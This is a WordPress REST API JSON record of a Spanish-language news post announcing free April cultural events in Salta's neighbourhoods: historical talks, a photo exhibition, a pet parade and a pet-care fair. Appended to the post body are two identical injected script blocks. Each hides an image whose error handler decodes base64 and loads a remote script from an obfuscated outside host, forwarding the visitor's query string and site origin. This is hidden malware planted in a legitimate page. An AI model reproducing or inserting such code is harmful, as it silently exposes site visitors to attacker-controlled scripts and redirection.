{"id":3926,"date":"2024-04-12T12:09:13","date_gmt":"2024-04-12T15:09:13","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3926"},"modified":"2025-08-13T23:57:08","modified_gmt":"2025-08-14T02:57:08","slug":"corredor-cultural-de-los-barrios-llego-abril-con-actividades-gratuitas-para-toda-la-familia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3926","title":{"rendered":"Corredor Cultural de los Barrios: lleg\u00f3 Abril con actividades gratuitas para toda la familia"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-7e2288f2f9414ba82d22536adcc08683\" style=\"background-color:#4e032a\"><em>El Mercado Artesanal de Salta, el Centro Cultural Dino Saluzzi y la Casona de Casta\u00f1ares, brindar\u00e1n una variedad de propuestas culturales como charlas sobre la historia, ferias, presentaciones art\u00edsticas y homenaje a las mascotas, entre otras.<\/em><\/h4>\n\n\n\n<p>La&nbsp;<strong>Secretar\u00eda de Cultura de la Provincia<\/strong>&nbsp;y la Agencia de Cultura de la Municipalidad de Salta, trabajan de manera mancomunada para acercar la cultura a los barrios y poner en valor el Mercado Artesanal, el Centro Cultural Dino Saluzzi y la Casona de Casta\u00f1ares, como polos culturales y patrimoniales de la zona.<\/p>\n\n\n\n<p>Las mismas se desarrollar\u00e1n en los diferentes espacios emblem\u00e1ticos de la Ciudad con entrada libre y gratuita.<\/p>\n\n\n\n<p>Durante un encuentro con medios period\u00edsticos locales, la directora del Mercado Artesanal de Salta, Yanina Lenti destac\u00f3 que se trata de un trabajo conjunto con actividades de diversa \u00edndole, de acceso libre y gratuito para que la familia salte\u00f1a y los vecinos disfruten de estos espacios culturales. &nbsp;<\/p>\n\n\n\n<p>Adem\u00e1s, participaron de la rueda de medios:&nbsp;<strong>Marcela Medrano<\/strong>, subsecretaria de la Agencia de Cultura Activa;&nbsp;<strong>Florencia Mora<\/strong>, directora general de Cultura Comunitaria y&nbsp;<strong>Antonio L\u00f3pez<\/strong>, director de la Casona de Casta\u00f1ares.<br>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11613-corredor-cultural-de-los-barrios-llego-abril-y-con-actividades-gratuitas-para-toda-la-familia.png\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11613-corredor-cultural-de-los-barrios-llego-abril-y-con-actividades-gratuitas-para-toda-la-familia.png\" alt=\"Corredor Cultural de los Barrios: lleg\u00f3 Abril y con actividades gratuitas para toda la familia\" style=\"width:342px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p><strong>Cronograma de actividades<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>S\u00e1bado 13 de abril<\/strong>, de 16 a 22 horas: \u201cZamba por Vos\u201d<\/li>\n<\/ul>\n\n\n\n<p><strong>Lugar:&nbsp;<\/strong>Casona de Casta\u00f1ares, Av. Bernardo Houssay S\/N Barrio 15 de febrero manzana E casa 30.<br>En caso de lluvia, el evento se reprograma.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Jueves 18 de abril<\/strong>, 10 horas: \u201cEl Dino Saluzzi a lo largo del tiempo\u201d<\/li>\n<\/ul>\n\n\n\n<p>Muestra Fotogr\u00e1fica y Charla sobre la historia del espacio, a cargo del profesor Fernando C\u00e1seres.<br><strong>Lugar:<\/strong>&nbsp;Centro Cultural Dino Saluzzi, Av. Independencia 910<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Jueves 25 de abril<\/strong>, 10 horas: \u201cLa Casona de Casta\u00f1ares a lo largo del tiempo\u201d<\/li>\n<\/ul>\n\n\n\n<p>Muestra Fotogr\u00e1fica y charla sobre la historia del espacio, a cargo del profesor Fernando C\u00e1seres.<br><strong>Lugar:<\/strong>&nbsp;Casona de Casta\u00f1ares, Av. Bernardo Houssay S\/N Barrio 15 de febrero manzana E casa 30.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Viernes 26 de abril<\/strong>, 18 horas: \u201cDesfile de Mascotas\u201d. A las\u00a017:30 horas, inscripciones de los participantes. Premios a los mejores looks. Encuentro para concientizar a los participantes y p\u00fablico asistente sobre los cuidados de las mascotas, la tenencia responsable, la alimentaci\u00f3n balanceada, la higiene y castraci\u00f3n.<\/li>\n<\/ul>\n\n\n\n<p><strong>Lugar:&nbsp;<\/strong>&nbsp;Mercado Artesanal de Salta, Av. San Mart\u00edn 2555.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Lunes 29 de abril<\/strong>, 17:30 a 20 horas: \u201cHuellitas en la Casona, mascotas en la ciudad\u201d<\/li>\n<\/ul>\n\n\n\n<p>Se realizar\u00e1 el evento en el marco del d\u00eda del animal con la participaci\u00f3n de la Banda de M\u00fasica Infantil de la Polic\u00eda de Salta y la Divisi\u00f3n Canes de la Polic\u00eda. Habr\u00e1 feria de emprendedores de ropa y accesorios para mascotas. As\u00ed tambi\u00e9n contar\u00e1 con la presencia del puesto de zoonosis para la atenci\u00f3n y reserva de turnos para castraciones, desparasitaciones, entre otros.<br><strong>Lugar:&nbsp;<\/strong>Casona de Casta\u00f1ares, Av. Bernardo Houssay S\/N Barrio 15 de febrero manzana E casa 30.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/corredor-cultural-de-los-barrios-llego-abril-con-actividades-gratuitas-para-toda-la-familia-95036\" target=\"_blank\" rel=\"noopener\" title=\"\">\u00a0<strong>Corredor Cultural de los Barrios: lleg\u00f3 Abril y con actividades gratuitas para toda la familia<\/strong><\/a><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Mercado Artesanal de Salta, el Centro Cultural Dino Saluzzi y la Casona de Casta\u00f1ares, brindar\u00e1n una variedad de propuestas culturales como charlas sobre la historia, ferias, presentaciones art\u00edsticas y homenaje a las mascotas, entre otras. La&nbsp;Secretar\u00eda de Cultura de la Provincia&nbsp;y la Agencia de Cultura de la Municipalidad de Salta, trabajan de manera mancomunada [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3927,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-3926","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3926"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3926"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3926\/revisions"}],"predecessor-version":[{"id":6803,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3926\/revisions\/6803"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3927"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3926"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3926"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3926"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}